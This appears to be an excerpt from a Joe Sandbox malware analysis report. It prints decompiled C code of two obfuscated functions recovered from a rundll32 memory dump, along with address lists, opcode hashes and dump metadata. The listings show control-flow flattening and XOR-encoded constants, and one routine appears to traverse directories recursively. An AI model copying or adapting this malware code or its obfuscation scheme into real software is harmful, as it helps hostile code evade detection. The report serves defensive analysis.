                                                                                                                          0x007a1458
                                                                                                                          0x007a1572
                                                                                                                          0x00000000
                                                                                                                          0x007a145e
                                                                                                                          0x007a145e
                                                                                                                          0x007a1460
                                                                                                                          0x007a163b
                                                                                                                          0x007a163b
                                                                                                                          0x007a1641
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007a1466
                                                                                                                          0x007a1485
                                                                                                                          0x007a14bc
                                                                                                                          0x007a14c3
                                                                                                                          0x007a14c8
                                                                                                                          0x007a14d1
                                                                                                                          0x007a1524
                                                                                                                          0x007a1536
                                                                                                                          0x007a1554
                                                                                                                          0x007a155b
                                                                                                                          0x007a1560
                                                                                                                          0x007a1565
                                                                                                                          0x007a156b
                                                                                                                          0x00000000
                                                                                                                          0x007a156b
                                                                                                                          0x007a1565
                                                                                                                          0x007a1460
                                                                                                                          0x007a1651
                                                                                                                          0x007a1651
                                                                                                                          0x007a1579
                                                                                                                          0x007a1587
                                                                                                                          0x007a158b
                                                                                                                          0x007a159a
                                                                                                                          0x007a159b
                                                                                                                          0x007a15a0
                                                                                                                          0x007a15a9
                                                                                                                          0x007a15f0
                                                                                                                          0x007a15fc
                                                                                                                          0x007a1605
                                                                                                                          0x007a160d
                                                                                                                          0x007a160f
                                                                                                                          0x007a1613
                                                                                                                          0x007a1614
                                                                                                                          0x007a1615
                                                                                                                          0x007a1616
                                                                                                                          0x007a1617
                                                                                                                          0x007a1629
                                                                                                                          0x007a162d
                                                                                                                          0x007a162e
                                                                                                                          0x007a1633
                                                                                                                          0x007a1636
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Fo$M_o9$[K
                                                                                                                          • API String ID: 0-3743190696
                                                                                                                          • Opcode ID: e193d30f39921c03e9bed1d1b18969abdb5d2a4ad93057c4e7227f725354ac9e
                                                                                                                          • Instruction ID: 2e05843772c3809d5b079dfcfc2540eb52bf64f662b12e6a50e51c71035f01a2
                                                                                                                          • Opcode Fuzzy Hash: e193d30f39921c03e9bed1d1b18969abdb5d2a4ad93057c4e7227f725354ac9e
                                                                                                                          • Instruction Fuzzy Hash: B2121EB1409381CFD368CF21C58AA9BBBF1FBC5708F508A1DE59A96260D7B58909CF53
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00799DCF Relevance: 4.1, Strings: 3, Instructions: 315COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 80%
                                                                                                                          			E00799DCF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				intOrPtr _v136;
				char _v160;
				short _v708;
				short _v710;
				char _v712;
				signed int _v756;
				char _v1276;
				char _v1796;
				void* _t278;
				signed int _t306;
				signed int _t310;
				void* _t312;
				intOrPtr _t317;
				void* _t319;
				signed int _t324;
				void* _t327;
				void* _t353;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				void* _t373;
				void* _t374;

				_t317 = _a12;
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_t317);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007A20B9(_t278);
				_v44 = 0x411c30;
				_t374 = _t373 + 0x20;
				_v44 = _v44 ^ 0x3aebcc2b;
				_v44 = _v44 ^ 0x10090153;
				_t319 = 0x338c922;
				_v44 = _v44 ^ 0x2aa3d158;
				_v56 = 0xa7c140;
				_v56 = _v56 >> 1;
				_v56 = _v56 ^ 0xbf613798;
				_v56 = _v56 ^ 0xbf3c535c;
				_v88 = 0xb7ebf9;
				_t365 = 0x52;
				_v88 = _v88 / _t365;
				_v88 = _v88 ^ 0x0004e01e;
				_v112 = 0x1a3e5b;
				_v112 = _v112 + 0xd588;
				_v112 = _v112 ^ 0x0012c9bc;
				_v8 = 0x55b84a;
				_t366 = 0x72;
				_v8 = _v8 * 0x74;
				_v8 = _v8 + 0xffff07de;
				_v8 = _v8 * 0x41;
				_v8 = _v8 ^ 0xdc74eedb;
				_v96 = 0x123c4e;
				_v96 = _v96 + 0x1d06;
				_v96 = _v96 ^ 0x001f978b;
				_v124 = 0x58f8d3;
				_v124 = _v124 * 0x2b;
				_v124 = _v124 ^ 0x0efbe47e;
				_v120 = 0x58d481;
				_v120 = _v120 << 5;
				_v120 = _v120 ^ 0x0b1fdd63;
				_v32 = 0x85548e;
				_v32 = _v32 / _t366;
				_v32 = _v32 * 0x2e;
				_v32 = _v32 ^ 0x0037cfdf;
				_v108 = 0x851b7a;
				_v108 = _v108 | 0xf3ff5f40;
				_v108 = _v108 ^ 0xf3fc1521;
				_v76 = 0x86d28f;
				_v76 = _v76 >> 0xd;
				_v76 = _v76 ^ 0x000a85f2;
				_v48 = 0x8a8988;
				_v48 = _v48 + 0xffff9d54;
				_v48 = _v48 + 0xffffb441;
				_v48 = _v48 ^ 0x008c2bbe;
				_v80 = 0x3fe2a4;
				_v80 = _v80 ^ 0x5e00b743;
				_v80 = _v80 ^ 0x5e39b1b0;
				_v116 = 0x4ea08b;
				_v116 = _v116 + 0xffffca32;
				_v116 = _v116 ^ 0x00427ef9;
				_v104 = 0xba6181;
				_v104 = _v104 + 0xf529;
				_v104 = _v104 ^ 0x00b33727;
				_v52 = 0x1e8210;
				_v52 = _v52 >> 8;
				_v52 = _v52 | 0xffb97487;
				_v52 = _v52 ^ 0xffb16a42;
				_v40 = 0xeabfd3;
				_v40 = _v40 ^ 0x26644279;
				_t367 = 0x3a;
				_v40 = _v40 / _t367;
				_v40 = _v40 ^ 0x00a36ea5;
				_v12 = 0xc9f67b;
				_v12 = _v12 + 0x836b;
				_v12 = _v12 | 0xa1408986;
				_t368 = 0x45;
				_v12 = _v12 * 0x75;
				_v12 = _v12 ^ 0xf1cc1c9a;
				_v36 = 0x1f6921;
				_v36 = _v36 ^ 0x9bf749ed;
				_v36 = _v36 / _t368;
				_v36 = _v36 ^ 0x024ed910;
				_v64 = 0x37ccf2;
				_v64 = _v64 + 0xfffff775;
				_t369 = 0x19;
				_v64 = _v64 * 0x24;
				_v64 = _v64 ^ 0x07d7b77b;
				_v28 = 0x370f8;
				_v28 = _v28 << 0xd;
				_v28 = _v28 + 0x6470;
				_v28 = _v28 >> 1;
				_v28 = _v28 ^ 0x37097055;
				_v20 = 0x84152c;
				_v20 = _v20 * 0x7e;
				_v20 = _v20 / _t369;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0x6c90d6a3;
				_v60 = 0x687dd9;
				_t370 = 0xc;
				_v60 = _v60 * 0x1d;
				_v60 = _v60 << 7;
				_v60 = _v60 ^ 0xeb212648;
				_v84 = 0xd09924;
				_v84 = _v84 * 0x7c;
				_v84 = _v84 ^ 0x650614c5;
				_v100 = 0x3804f2;
				_v100 = _v100 | 0x9eb8052c;
				_v100 = _v100 ^ 0x9eb506d7;
				_v92 = 0xf492b0;
				_v92 = _v92 + 0xffffc4ae;
				_v92 = _v92 ^ 0x00fafa5e;
				_v16 = 0xd0e41e;
				_v16 = _v16 * 0x3d;
				_v16 = _v16 >> 0xd;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 ^ 0x000dc1c9;
				_v24 = 0x66d2fe;
				_v24 = _v24 / _t370;
				_v24 = _v24 + 0xffffccd2;
				_v24 = _v24 ^ 0x0a93dd72;
				_v24 = _v24 ^ 0x0a9c564f;
				_v72 = 0xbcf4e;
				_v72 = _v72 >> 7;
				_v72 = _v72 ^ 0x000c8ddf;
				_t364 = _v72;
				_v68 = 0x4616df;
				_v68 = _v68 + 0x9c8e;
				_v68 = _v68 + 0xaaef;
				_v68 = _v68 ^ 0x004c065d;
				while(1) {
					L1:
					_t353 = 0x2e;
					L2:
					while(_t319 != 0x21229d9) {
						if(_t319 == 0x338c922) {
							_v136 = _t317;
							_t319 = 0x9035918;
							continue;
						}
						if(_t319 == 0x5b964d8) {
							__eflags = _v756 & _v44;
							if(__eflags == 0) {
								_t306 = _a16( &_v756,  &_v160);
								asm("sbb ecx, ecx");
								_t324 =  ~_t306 & 0x09c7cc54;
								L9:
								_t319 = _t324 + 0x21229d9;
								while(1) {
									L1:
									_t353 = 0x2e;
									goto L2;
								}
							}
							__eflags = _v712 - _t353;
							if(_v712 != _t353) {
								L19:
								__eflags = _a24;
								if(__eflags != 0) {
									_push(_v104);
									_push(_v116);
									_t312 = E007ADCF7(_v80, 0x7917a0, __eflags);
									_pop(_t327);
									E007947CE(_t317, _v52, _t327, _v40, _v12, _t312,  &_v712, _v36, _v64);
									E00799DCF(_v28, _v20, _v60, _a8,  &_v1276, _a16, _v84, _a24);
									_t310 = E0079A8B0(_v100, _t312, _v92);
									_t374 = _t374 + 0x3c;
									_t353 = 0x2e;
								}
								L18:
								_t319 = 0xbd9f62d;
								continue;
							}
							__eflags = _v710;
							if(__eflags == 0) {
								goto L18;
							}
							__eflags = _v710 - _t353;
							if(_v710 != _t353) {
								goto L19;
							}
							__eflags = _v708;
							if(__eflags != 0) {
								goto L19;
							}
							goto L18;
						}
						if(_t319 == 0x9035918) {
							_push(_v112);
							_push(_v88);
							E0079A918(_t317, __eflags, _v8, _v96, E007ADCF7(_v56, 0x791770, __eflags), _v124,  &_v1796);
							_t374 = _t374 + 0x1c;
							_t310 = E0079A8B0(_v120, _t307, _v32);
							_t319 = 0xb066d4a;
							while(1) {
								L1:
								_t353 = 0x2e;
								goto L2;
							}
						}
						if(_t319 == 0xb066d4a) {
							_t310 = E00797E00(_v108,  &_v756, _v76, _v48,  &_v1796);
							_t364 = _t310;
							_t374 = _t374 + 0xc;
							__eflags = _t310 - 0xffffffff;
							if(__eflags == 0) {
								L25:
								return _t310;
							}
							_t319 = 0x5b964d8;
							goto L1;
						}
						if(_t319 != 0xbd9f62d) {
							L24:
							__eflags = _t319 - 0xa89df2;
							if(__eflags != 0) {
								continue;
							}
							goto L25;
						}
						_t310 = E00794635(_v16,  &_v756, _t364, _v24);
						asm("sbb ecx, ecx");
						_t324 =  ~_t310 & 0x03a73aff;
						goto L9;
					}
					E00798ABF(_t364, _v72, _v68);
					_t319 = 0xa89df2;
					_t353 = 0x2e;
					goto L24;
				}
			}


























































                                                                                                                          0x00799dd9
                                                                                                                          0x00799dde
                                                                                                                          0x00799de1
                                                                                                                          0x00799de4
                                                                                                                          0x00799de7
                                                                                                                          0x00799de8
                                                                                                                          0x00799deb
                                                                                                                          0x00799dee
                                                                                                                          0x00799def
                                                                                                                          0x00799df0
                                                                                                                          0x00799df5
                                                                                                                          0x00799dfc
                                                                                                                          0x00799dff
                                                                                                                          0x00799e08
                                                                                                                          0x00799e0f
                                                                                                                          0x00799e14
                                                                                                                          0x00799e1b
                                                                                                                          0x00799e22
                                                                                                                          0x00799e25
                                                                                                                          0x00799e2c
                                                                                                                          0x00799e33
                                                                                                                          0x00799e3f
                                                                                                                          0x00799e44
                                                                                                                          0x00799e49
                                                                                                                          0x00799e50
                                                                                                                          0x00799e57
                                                                                                                          0x00799e5e
                                                                                                                          0x00799e65
                                                                                                                          0x00799e70
                                                                                                                          0x00799e71
                                                                                                                          0x00799e74
                                                                                                                          0x00799e7f
                                                                                                                          0x00799e82
                                                                                                                          0x00799e89
                                                                                                                          0x00799e90
                                                                                                                          0x00799e97
                                                                                                                          0x00799e9e
                                                                                                                          0x00799ea9
                                                                                                                          0x00799eac
                                                                                                                          0x00799eb3
                                                                                                                          0x00799eba
                                                                                                                          0x00799ebe
                                                                                                                          0x00799ec5
                                                                                                                          0x00799ed1
                                                                                                                          0x00799ed8
                                                                                                                          0x00799edb
                                                                                                                          0x00799ee2
                                                                                                                          0x00799ee9
                                                                                                                          0x00799ef0
                                                                                                                          0x00799ef7
                                                                                                                          0x00799efe
                                                                                                                          0x00799f02
                                                                                                                          0x00799f09
                                                                                                                          0x00799f10
                                                                                                                          0x00799f17
                                                                                                                          0x00799f1e
                                                                                                                          0x00799f25
                                                                                                                          0x00799f2c
                                                                                                                          0x00799f33
                                                                                                                          0x00799f3a
                                                                                                                          0x00799f41
                                                                                                                          0x00799f48
                                                                                                                          0x00799f4f
                                                                                                                          0x00799f56
                                                                                                                          0x00799f5d
                                                                                                                          0x00799f64
                                                                                                                          0x00799f6b
                                                                                                                          0x00799f71
                                                                                                                          0x00799f78
                                                                                                                          0x00799f7f
                                                                                                                          0x00799f86
                                                                                                                          0x00799f92
                                                                                                                          0x00799f97
                                                                                                                          0x00799f9c
                                                                                                                          0x00799fa3
                                                                                                                          0x00799faa
                                                                                                                          0x00799fb1
                                                                                                                          0x00799fbc
                                                                                                                          0x00799fbf
                                                                                                                          0x00799fc2
                                                                                                                          0x00799fc9
                                                                                                                          0x00799fd0
                                                                                                                          0x00799fde
                                                                                                                          0x00799fe1
                                                                                                                          0x00799fe8
                                                                                                                          0x00799fef
                                                                                                                          0x00799ffa
                                                                                                                          0x00799ffd
                                                                                                                          0x0079a000
                                                                                                                          0x0079a007
                                                                                                                          0x0079a00e
                                                                                                                          0x0079a012
                                                                                                                          0x0079a019
                                                                                                                          0x0079a01c
                                                                                                                          0x0079a023
                                                                                                                          0x0079a02e
                                                                                                                          0x0079a038
                                                                                                                          0x0079a03b
                                                                                                                          0x0079a03f
                                                                                                                          0x0079a046
                                                                                                                          0x0079a051
                                                                                                                          0x0079a052
                                                                                                                          0x0079a055
                                                                                                                          0x0079a059
                                                                                                                          0x0079a060
                                                                                                                          0x0079a06b
                                                                                                                          0x0079a06e
                                                                                                                          0x0079a075
                                                                                                                          0x0079a07c
                                                                                                                          0x0079a083
                                                                                                                          0x0079a08a
                                                                                                                          0x0079a091
                                                                                                                          0x0079a098
                                                                                                                          0x0079a09f
                                                                                                                          0x0079a0aa
                                                                                                                          0x0079a0ad
                                                                                                                          0x0079a0b1
                                                                                                                          0x0079a0b5
                                                                                                                          0x0079a0bc
                                                                                                                          0x0079a0c8
                                                                                                                          0x0079a0cb
                                                                                                                          0x0079a0d2
                                                                                                                          0x0079a0d9
                                                                                                                          0x0079a0e0
                                                                                                                          0x0079a0e7
                                                                                                                          0x0079a0eb
                                                                                                                          0x0079a0f2
                                                                                                                          0x0079a0f5
                                                                                                                          0x0079a0fc
                                                                                                                          0x0079a103
                                                                                                                          0x0079a10a
                                                                                                                          0x0079a111
                                                                                                                          0x0079a111
                                                                                                                          0x0079a113
                                                                                                                          0x00000000
                                                                                                                          0x0079a114
                                                                                                                          0x0079a126
                                                                                                                          0x0079a2d3
                                                                                                                          0x0079a2d9
                                                                                                                          0x00000000
                                                                                                                          0x0079a2d9
                                                                                                                          0x0079a132
                                                                                                                          0x0079a1fa
                                                                                                                          0x0079a200
                                                                                                                          0x0079a2bf
                                                                                                                          0x0079a2c6
                                                                                                                          0x0079a2c8
                                                                                                                          0x0079a174
                                                                                                                          0x0079a174
                                                                                                                          0x0079a111
                                                                                                                          0x0079a111
                                                                                                                          0x0079a113
                                                                                                                          0x00000000
                                                                                                                          0x0079a113
                                                                                                                          0x0079a111
                                                                                                                          0x0079a206
                                                                                                                          0x0079a20d
                                                                                                                          0x0079a236
                                                                                                                          0x0079a236
                                                                                                                          0x0079a23a
                                                                                                                          0x0079a23c
                                                                                                                          0x0079a244
                                                                                                                          0x0079a24a
                                                                                                                          0x0079a250
                                                                                                                          0x0079a273
                                                                                                                          0x0079a294
                                                                                                                          0x0079a2a1
                                                                                                                          0x0079a2a6
                                                                                                                          0x0079a2ab
                                                                                                                          0x0079a2ab
                                                                                                                          0x0079a22c
                                                                                                                          0x0079a22c
                                                                                                                          0x00000000
                                                                                                                          0x0079a22c
                                                                                                                          0x0079a20f
                                                                                                                          0x0079a217
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079a219
                                                                                                                          0x0079a220
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079a222
                                                                                                                          0x0079a22a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079a22a
                                                                                                                          0x0079a13e
                                                                                                                          0x0079a1af
                                                                                                                          0x0079a1b7
                                                                                                                          0x0079a1d7
                                                                                                                          0x0079a1dc
                                                                                                                          0x0079a1e7
                                                                                                                          0x0079a1ed
                                                                                                                          0x0079a111
                                                                                                                          0x0079a111
                                                                                                                          0x0079a113
                                                                                                                          0x00000000
                                                                                                                          0x0079a113
                                                                                                                          0x0079a111
                                                                                                                          0x0079a146
                                                                                                                          0x0079a192
                                                                                                                          0x0079a197
                                                                                                                          0x0079a199
                                                                                                                          0x0079a19c
                                                                                                                          0x0079a19f
                                                                                                                          0x0079a30b
                                                                                                                          0x0079a30b
                                                                                                                          0x0079a30b
                                                                                                                          0x0079a1a5
                                                                                                                          0x00000000
                                                                                                                          0x0079a1a5
                                                                                                                          0x0079a14e
                                                                                                                          0x0079a2f9
                                                                                                                          0x0079a2f9
                                                                                                                          0x0079a2ff
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079a2ff
                                                                                                                          0x0079a161
                                                                                                                          0x0079a16c
                                                                                                                          0x0079a16e
                                                                                                                          0x00000000
                                                                                                                          0x0079a16e
                                                                                                                          0x0079a2eb
                                                                                                                          0x0079a2f3
                                                                                                                          0x0079a2f8
                                                                                                                          0x00000000
                                                                                                                          0x0079a2f8

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: H&!$Up7$yBd&
                                                                                                                          • API String ID: 0-2352930472
                                                                                                                          • Opcode ID: 2f5c0fe25a1f433902fa4b4e49c3871b41a41807ed6d38f24a61b9b93917f10d
                                                                                                                          • Instruction ID: 0a114c70b75be894390458b5cd9c8a7d377747ef2bf4f02fb67b8e80446c2589
                                                                                                                          • Opcode Fuzzy Hash: 2f5c0fe25a1f433902fa4b4e49c3871b41a41807ed6d38f24a61b9b93917f10d
                                                                                                                          • Instruction Fuzzy Hash: A1E16671D0121DEBCF28DFE4E98A9EEBBB1FB44314F208159E515BA260D7B80A45CF81
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007A95FA Relevance: 4.0, Strings: 3, Instructions: 282COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E007A95FA() {
				char _v524;
				signed int _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				intOrPtr _t295;
				void* _t297;
				void* _t298;
				intOrPtr _t299;
				signed int _t306;
				void* _t309;
				void* _t310;
				char _t311;
				void* _t317;
				intOrPtr _t334;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				void* _t347;

				_v668 = 0xe6fb93;
				_v668 = _v668 + 0xffff1eed;
				_t310 = 0xada6804;
				_v668 = _v668 * 0x61;
				_t309 = 0;
				_v668 = _v668 ^ 0xaca28cc6;
				_v668 = _v668 ^ 0xfb928647;
				_v616 = 0x8caf33;
				_t341 = 0x42;
				_v616 = _v616 * 0x25;
				_v616 = _v616 * 0x4f;
				_v616 = _v616 ^ 0x46546a51;
				_v620 = 0x861136;
				_v620 = _v620 | 0x52f06d4d;
				_v620 = _v620 >> 0xf;
				_v620 = _v620 ^ 0x0000a5ef;
				_v628 = 0x4cf396;
				_v628 = _v628 >> 1;
				_v628 = _v628 >> 9;
				_v628 = _v628 ^ 0x0000133c;
				_v684 = 0xc54e58;
				_v684 = _v684 >> 2;
				_v684 = _v684 ^ 0xb8bf25ee;
				_v684 = _v684 >> 2;
				_v684 = _v684 ^ 0x2e259ad3;
				_v592 = 0x68267f;
				_v592 = _v592 + 0xffff39c4;
				_v592 = _v592 ^ 0x006c60f9;
				_v632 = 0xa1d089;
				_v632 = _v632 / _t341;
				_v632 = _v632 ^ 0x52222b14;
				_v632 = _v632 ^ 0x5220bcfc;
				_v608 = 0x39d352;
				_v608 = _v608 | 0x2e7e1ae1;
				_v608 = _v608 ^ 0x576cc274;
				_v608 = _v608 ^ 0x7911cf35;
				_v660 = 0xc26f36;
				_v660 = _v660 ^ 0x9f5dc88a;
				_v660 = _v660 ^ 0xeefda613;
				_t342 = 0x3f;
				_v660 = _v660 / _t342;
				_v660 = _v660 ^ 0x01ce77bb;
				_v624 = 0x334861;
				_v624 = _v624 + 0xffff4b1a;
				_t343 = 0x2a;
				_v624 = _v624 * 0x2f;
				_v624 = _v624 ^ 0x0947e580;
				_v652 = 0xab72b9;
				_v652 = _v652 << 8;
				_v652 = _v652 / _t343;
				_v652 = _v652 ^ 0x0419701b;
				_v688 = 0x507748;
				_v688 = _v688 << 5;
				_v688 = _v688 + 0xffff449a;
				_v688 = _v688 + 0xb858;
				_v688 = _v688 ^ 0x0a0a66f0;
				_v600 = 0x95cabc;
				_v600 = _v600 + 0xffffb185;
				_v600 = _v600 << 9;
				_v600 = _v600 ^ 0x2af43595;
				_v580 = 0x7e3ec7;
				_v580 = _v580 ^ 0x09caac24;
				_v580 = _v580 ^ 0x09b70662;
				_v612 = 0xa526a8;
				_v612 = _v612 | 0x64dab874;
				_v612 = _v612 >> 0xe;
				_v612 = _v612 ^ 0x0006f9eb;
				_v604 = 0xb7de18;
				_t344 = 0x48;
				_v604 = _v604 * 0x79;
				_v604 = _v604 * 0x31;
				_v604 = _v604 ^ 0xa26ee4e9;
				_v640 = 0x553c00;
				_v640 = _v640 + 0xffff4196;
				_v640 = _v640 + 0xffff8daf;
				_v640 = _v640 ^ 0x00577a07;
				_v576 = 0xaac37;
				_v576 = _v576 * 0x77;
				_v576 = _v576 ^ 0x04fc3a71;
				_v676 = 0xb6ce7b;
				_v676 = _v676 >> 1;
				_v676 = _v676 * 0x28;
				_v676 = _v676 >> 0xb;
				_v676 = _v676 ^ 0x000b20b4;
				_v584 = 0x4877b4;
				_v584 = _v584 << 1;
				_v584 = _v584 ^ 0x009148e9;
				_v588 = 0xaf1c90;
				_v588 = _v588 * 0x5b;
				_v588 = _v588 ^ 0x3e3937c6;
				_v644 = 0x150bb3;
				_v644 = _v644 + 0x865c;
				_v644 = _v644 + 0x5404;
				_v644 = _v644 ^ 0x001dce65;
				_v648 = 0xaa3958;
				_v648 = _v648 / _t344;
				_v648 = _v648 >> 0xe;
				_v648 = _v648 ^ 0x000a9525;
				_v596 = 0xdb2add;
				_v596 = _v596 << 0xd;
				_v596 = _v596 ^ 0x65528fd4;
				_v680 = 0xd04d0c;
				_v680 = _v680 << 5;
				_t340 = _v596;
				_v680 = _v680 * 0x55;
				_v680 = _v680 | 0x96843ebb;
				_v680 = _v680 ^ 0xb7be4a39;
				_v656 = 0x2591b4;
				_v656 = _v656 ^ 0x7517a4f1;
				_v656 = _v656 ^ 0xb20365ef;
				_v656 = _v656 + 0xffff4c4f;
				_v656 = _v656 ^ 0xc733773b;
				_v636 = 0xbfc674;
				_v636 = _v636 * 0x1d;
				_v636 = _v636 << 6;
				_v636 = _v636 ^ 0x6e5b8cbc;
				_v664 = 0x3235cc;
				_v664 = _v664 << 1;
				_v664 = _v664 | 0x857b9d7f;
				_v664 = _v664 * 0x28;
				_v664 = _v664 ^ 0xdbf98c50;
				_v672 = 0xb181ad;
				_v672 = _v672 >> 0xa;
				_v672 = _v672 << 2;
				_v672 = _v672 ^ 0xdb7e6d02;
				_v672 = _v672 ^ 0xdb78e9e9;
				do {
					while(_t310 != 0x10c1a7f) {
						if(_t310 == 0x31db0c0) {
							_t311 = _v572;
							_t295 = _v568;
							_push(_t311);
							_v560 = _t295;
							_v552 = _t295;
							_v544 = _t295;
							_v536 = _t295;
							_v564 = _t311;
							_v556 = _t311;
							_v548 = _t311;
							_v540 = _t311;
							_v532 = _v628;
							_t297 = E00795DDD( &_v564, _t340, _v644, _v648, _t311, _v596, _v680);
							_t347 = _t347 + 0x18;
							__eflags = _t297;
							_t309 =  !=  ? 1 : _t309;
							_t310 = 0x48f7cbb;
							continue;
						} else {
							if(_t310 == 0x461819e) {
								_push(_v660);
								_push(_v608);
								_t298 = E007ADCF7(_v632, 0x791000, __eflags);
								_pop(_t317);
								_t299 =  *0x7b3e10; // 0x0
								_t334 =  *0x7b3e10; // 0x0
								E007947CE(_t334 + 0x23c, _v624, _t317, _v652, _v688, _t298, _t299 + 0x1c, _v600, _v580);
								E0079A8B0(_v612, _t298, _v604);
								_t347 = _t347 + 0x24;
								_t310 = 0xa22489e;
								continue;
							} else {
								if(_t310 == 0x48f7cbb) {
									E007A1E67(_v656, _v636, _v664, _v672, _t340);
								} else {
									if(_t310 == 0xa22489e) {
										_t306 = E00798F65(_v640, _v576,  &_v524, _v676, 0, _t310, _v616, _v584, _v620, _v588, _t310, _v668);
										_t340 = _t306;
										_t347 = _t347 + 0x28;
										__eflags = _t306 - 0xffffffff;
										if(__eflags != 0) {
											_t310 = 0x31db0c0;
											continue;
										}
									} else {
										if(_t310 == 0xada6804) {
											_t310 = 0xcbcd90e;
											continue;
										} else {
											if(_t310 != 0xcbcd90e) {
												goto L15;
											} else {
												E007AC1EC(_v684, _v592,  &_v572);
												_t310 = 0x10c1a7f;
												continue;
											}
										}
									}
								}
							}
						}
						L18:
						return _t309;
					}
					_v572 = _v572 - E007AABD1();
					_t310 = 0x461819e;
					asm("sbb [esp+0x8c], edx");
					L15:
					__eflags = _t310 - 0x7e6efe8;
				} while (__eflags != 0);
				goto L18;
			}



























































                                                                                                                          0x007a9600
                                                                                                                          0x007a960a
                                                                                                                          0x007a9612
                                                                                                                          0x007a9620
                                                                                                                          0x007a9624
                                                                                                                          0x007a9626
                                                                                                                          0x007a962e
                                                                                                                          0x007a9636
                                                                                                                          0x007a9645
                                                                                                                          0x007a9648
                                                                                                                          0x007a9651
                                                                                                                          0x007a9655
                                                                                                                          0x007a965d
                                                                                                                          0x007a9665
                                                                                                                          0x007a966d
                                                                                                                          0x007a9672
                                                                                                                          0x007a967a
                                                                                                                          0x007a9682
                                                                                                                          0x007a9686
                                                                                                                          0x007a968b
                                                                                                                          0x007a9693
                                                                                                                          0x007a969b
                                                                                                                          0x007a96a0
                                                                                                                          0x007a96a8
                                                                                                                          0x007a96ad
                                                                                                                          0x007a96b5
                                                                                                                          0x007a96bd
                                                                                                                          0x007a96c5
                                                                                                                          0x007a96cd
                                                                                                                          0x007a96dd
                                                                                                                          0x007a96e1
                                                                                                                          0x007a96e9
                                                                                                                          0x007a96f1
                                                                                                                          0x007a96f9
                                                                                                                          0x007a9701
                                                                                                                          0x007a9709
                                                                                                                          0x007a9711
                                                                                                                          0x007a9719
                                                                                                                          0x007a9721
                                                                                                                          0x007a972d
                                                                                                                          0x007a9732
                                                                                                                          0x007a9738
                                                                                                                          0x007a9740
                                                                                                                          0x007a9748
                                                                                                                          0x007a9755
                                                                                                                          0x007a9756
                                                                                                                          0x007a975a
                                                                                                                          0x007a9762
                                                                                                                          0x007a976a
                                                                                                                          0x007a9775
                                                                                                                          0x007a9779
                                                                                                                          0x007a9781
                                                                                                                          0x007a9789
                                                                                                                          0x007a978e
                                                                                                                          0x007a9796
                                                                                                                          0x007a979e
                                                                                                                          0x007a97a6
                                                                                                                          0x007a97ae
                                                                                                                          0x007a97b6
                                                                                                                          0x007a97bb
                                                                                                                          0x007a97c3
                                                                                                                          0x007a97ce
                                                                                                                          0x007a97db
                                                                                                                          0x007a97eb
                                                                                                                          0x007a97f3
                                                                                                                          0x007a97fb
